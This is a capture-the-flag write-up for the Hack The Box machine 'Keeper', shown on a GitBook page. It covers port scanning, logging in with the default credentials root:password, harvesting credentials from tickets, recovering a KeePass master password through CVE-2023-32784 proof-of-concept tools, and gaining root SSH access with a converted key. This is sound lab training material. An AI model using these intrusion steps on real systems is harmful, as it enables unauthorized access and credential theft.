HTB Writeups
  • HTB Writeups
  • Boxes: Very Easy
    • Academy
    • Archetype
    • Arctic
    • Base
    • Bike
    • Blue
    • Explosion
    • Included
    • Markup
    • Oopsie
    • Redeemer
    • Responder
    • Shield
    • Unified
    • Vaccine
  • Boxes: Easy
    • Analytics
    • Armageddon
    • Bashed
    • Beep
    • Blocky
    • Bounty Hunter
    • Buff
    • Cap
    • CozyHosting
    • Devel
    • Explore
    • Forest
    • Grandpa
    • Granny
    • Horizontall
    • Jerry
    • Keeper
    • Knife
    • Lame
    • Late
    • Legacy
    • Mirai
    • Netmon
    • Nibbles
    • Optimum
    • Paper
    • Photobomb
    • Precious
    • RedPanda
    • Return
    • Sau
    • ScriptKiddie
    • Sense
    • Servmon
    • Shocker
    • Shoppy
    • Squashed
    • Trick
  • Boxes: Medium
    • Poison
  • Challenges
    • Behind the Scenes
    • Canvas
    • Debugging Interface
    • Digital Cube
    • Easy Phish
    • Find the Easy Pass
    • Forest
    • Infiltration
    • misDIRection
    • Pusheen Loves Graphs
    • Retro
    • Signals
    • The Secret of a Queen
    • Wrong Spooky Season
  • Fortresses
  • Cyber Apocalypse 2023: The Cursed Mission
    • The Cursed Mission
    • Alien Cradle
    • Critical Flight
    • Debug
    • Extraterrestrial Persistence
    • Getting Started
    • Needle in the Haystack
    • Orbital
    • Packet Cyclone
    • Passman
    • Perfect Sync
    • Persistence
    • Plaintext Tleasure
    • Questionnaire
    • Reconfiguration
    • Relic Maps
    • Roten
    • Secret Code
    • Shattered Tablet
    • Small StEps
  • Hack the Boo 2023
    • Hauntmart
    • Spellbrewery
    • Trick or Treat
    • Valhalloween
  • Cyber Apocalypse 2024: Hacker Royale
    • Hacker Royale
    • An Unusual Sighting
    • BoxCutter
    • BunnyPass
    • Character
    • Data Siege
    • Delulu
    • Dynastic
    • Fake Boost
    • Flag Command
    • Game Invitation
    • It has begun
    • KORP Terminal
    • Labyrinth Linguist
    • LockTalk
    • Lucky Faucet
    • Makeshift
    • Maze
    • Packed Away
    • Phreaky
    • Primary Knowledge
    • Pursue the Tracks
    • Rids
    • Russian Roulette
    • Stop Drop and Roll
    • Testimonial
    • TimeKORP
    • Unbreakable
    • Urgent
  • CYBER APOCALYPSE 2025: Tales from Eldoria
    • Tales from Eldoria
    • A New Hire
    • Cave Expedition
    • Echoes in Stone
    • Eldorion
    • Embassy
    • EncryptedScroll
    • HeliosDEX
    • Quack Quack
    • Silent Trap
    • Stealth Invasion
    • Tales for the Brave
    • The Ancient Citadel
    • The Hillside Haven
    • The Stone That Whispers
    • Thorins Amulet
    • ToolPie
    • Traces
    • Trial by Fire
    • Whispers of the Moonbeam
Powered by GitBook
On this page
  • Enumeration
  • Default Creds & Pillaging
  • KeePass Database Exploit
  • Persistence
  1. Boxes: Easy

Keeper

Personal Rating: Easy

PreviousJerryNextKnife

Last updated 1 year ago

Enumeration

sudo map -v -sV <IP>

Nmap scan report for 10.10.11.227
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

It shows a login page with the info »|« RT 4.4.4+dfsg-2ubuntu1 from BestPractical

Default Creds & Pillaging

The default credentials root:password worked to log in

At the homepage there was one ticket about a Windows keepass issue and a username:

There are also mail addresses:

  • root@localhost

  • rt@keeper.htb

  • webmaster@keeper.htb

  • rt-comment@keeper.htb

  • rt@keeper.htb

There are mails that potentially indicate an insecure handling of sensitive data/files:

Lise,
 “Attached to this ticket is a crash dump of the keepass program”
 
 I have saved the file to my home directory and removed the attachment for security reasons.

Once my investigation of the crash dump is complete, I will let you know.

Real Name: Enoch Root
Email Address: root@localhost
Name: root
Shredder needs a directory to write dumps to.
Please ensure that the directory /var/lib/request-tracker4/data/RT-Shredder
exists and that it is writable by your web server.

I continued pillaging the ticket system to find some credentials:

KeePass Database Exploit

Logging in with these credentials via ssh worked. Investigating the KeePass version, I found CVE-2023-32784 to be likely exploitable. Using a PoC I got this result: dgrd med flde

It seems like something is off with the result.

I tried a different PoC, thinking that the first one was not working: https://github.com/vdohney/keepass-password-dumper

The result was ødgrød med fløde which shows what the issue with the first PoC was. The result as password did not work however.

Searching for that on google yields "Rødgrød med Fløde" as a well known tourist location, which then worked as the password if used from a file.

Persistence

Finally, I converted and used the ssh key for persistence:

puttygen root.ppk -O private-openssh -o id_rsa
ssh -i id_rsa root@10.10.11.227

root@keeper:~# cat root.txt

This refers to so I added the subdomain to my hosts file

Found this at

http://tickets.keeper.htb/rt/
http://tickets.keeper.htb/rt/Admin/Tools/Shredder
http://tickets.keeper.htb/rt/Admin/Tools/Configuration.html